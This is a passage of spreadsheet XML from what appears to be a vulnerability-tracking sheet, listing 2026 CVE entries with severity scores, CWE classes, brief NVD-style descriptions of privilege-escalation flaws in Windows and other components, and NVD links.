      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55285</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55294</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56198</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5729</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S456"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T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58599</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58600</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58611</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>microsoft:xbox_gaming_services</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58820</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58823</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58839</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58846</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58874</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S464"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T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58941</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62804</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
